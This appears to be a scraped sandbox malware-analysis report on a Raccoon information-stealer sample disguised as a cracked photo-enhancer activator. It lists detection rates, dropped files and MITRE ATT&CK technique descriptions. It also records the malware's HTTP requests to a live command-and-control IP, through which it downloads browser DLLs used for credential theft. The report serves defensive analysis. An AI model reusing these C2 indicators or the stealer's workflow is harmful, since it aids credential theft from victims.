Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mediachance.com/.
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mediachance.com/2

Source: KbqArOlW06.exe	Virustotal: Detection: 26%	Perma Link
Source: KbqArOlW06.exe	Metadefender: Detection: 28%	Perma Link
Source: KbqArOlW06.exe	ReversingLabs: Detection: 69%

Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown	TCP traffic detected without corresponding DNS query: 51.195.166.178

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KbqArOlW06.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Zdpo36n9Wt80

C:\Users\user\AppData\LocalLow\freebl3.dll

C:\Users\user\AppData\LocalLow\mozglue.dll

C:\Users\user\AppData\LocalLow\msvcp140.dll

C:\Users\user\AppData\LocalLow\nss3.dll

C:\Users\user\AppData\LocalLow\softokn3.dll

C:\Users\user\AppData\LocalLow\sqlite3.dll

C:\Users\user\AppData\LocalLow\vcruntime140.dll

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KbqArOlW06.exe.log

C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
KbqArOlW06.exe

Function 00404654 Relevance: 43.9, APIs: 7, Strings: 18, Instructions: 182
libraryloaderCOMMON

Function 0040A050 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Function 00405694 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 0040AF8D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109
COMMON

Function 00409558 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 56
libraryloaderCOMMON

Function 0040AF7A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Function 00409EC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Function 0040ACEC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Function 0040AD07 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Function 00409808 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Function 00401430 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37
memoryCOMMON

Function 0040150C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 62
COMMON

Function 004015C4 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
memoryCOMMON

Function 00401658 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48
COMMON

Function 00407454 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Function 00407AE0 Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Function 00407B20 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Function 00407A78 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Function 00405708 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 00407A2A Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre